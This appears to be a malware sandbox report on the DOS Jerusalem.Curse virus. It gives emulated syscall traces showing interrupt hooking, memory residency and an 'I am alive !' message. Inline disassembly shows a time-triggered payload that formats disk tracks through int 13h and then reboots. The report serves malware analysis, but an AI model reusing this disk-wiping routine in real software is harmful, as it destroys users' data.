Sample viewer

vx.netlux.org/Virus.DOS.Jerusalem.Curse.1653.e

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:41:22.132767851Z 240 PC: 12ada | UNKNOWN!
2018-12-17T22:41:22.134859127Z 240 PC: 12b05 | UNKNOWN!
2018-12-17T22:41:22.135991532Z 74 PC: 12b88 | Reallocate memory
2018-12-17T22:41:22.137381548Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:22.143790423Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:22.146588457Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-17T22:41:22.149142822Z 75 PC: 12c19 | Execute program
2018-12-17T22:41:22.170633011Z 9 PC: 132d0 | Display string (String= 'I am alive ! ')
2018-12-17T22:41:22.173875803Z 76 PC: 132d5 | Terminate with return code (Return code = '0')
2018-12-17T22:41:22.176075014Z 73 PC: 12c1f | Release memory
2018-12-17T22:41:22.178091304Z 77 PC: 12c23 | Get program return code
2018-12-17T22:41:22.179793903Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7192,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:04.975421243Z 240 PC: 12ada | UNKNOWN!
2018-12-25T12:01:04.976164696Z 240 PC: 12b05 | UNKNOWN!
2018-12-25T12:01:04.977109672Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:01:04.978854971Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:04.980107199Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:04.981633477Z 44 PC: 12bde | Get time 0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-25T12:01:04.984271536Z 75 PC: 12c19 | Execute program
2018-12-25T12:01:05.001501939Z 9 PC: 132d0 | Display string (String= 'I am alive ! ')
2018-12-25T12:01:05.005406558Z 76 PC: 132d5 | Terminate with return code (Return code = '0')
2018-12-25T12:01:05.008778347Z 73 PC: 12c1f | Release memory
2018-12-25T12:01:05.010101829Z 77 PC: 12c23 | Get program return code
2018-12-25T12:01:05.011326474Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":23,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7192,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:05.81207395Z 2 PC: 1268d | Character output (Char = '45')
2018-12-25T12:01:05.814787109Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.816927135Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.81891808Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.821190784Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.824095111Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.827062823Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.82997446Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.832642459Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.835102285Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.837209295Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.839192281Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.842081875Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.84417001Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.846607523Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.854144085Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.859316681Z 2 PC: 1268d | Character output (See above)
2018-12-25T12:01:05.862185055Z 2 PC: 1268d | Character output (See above)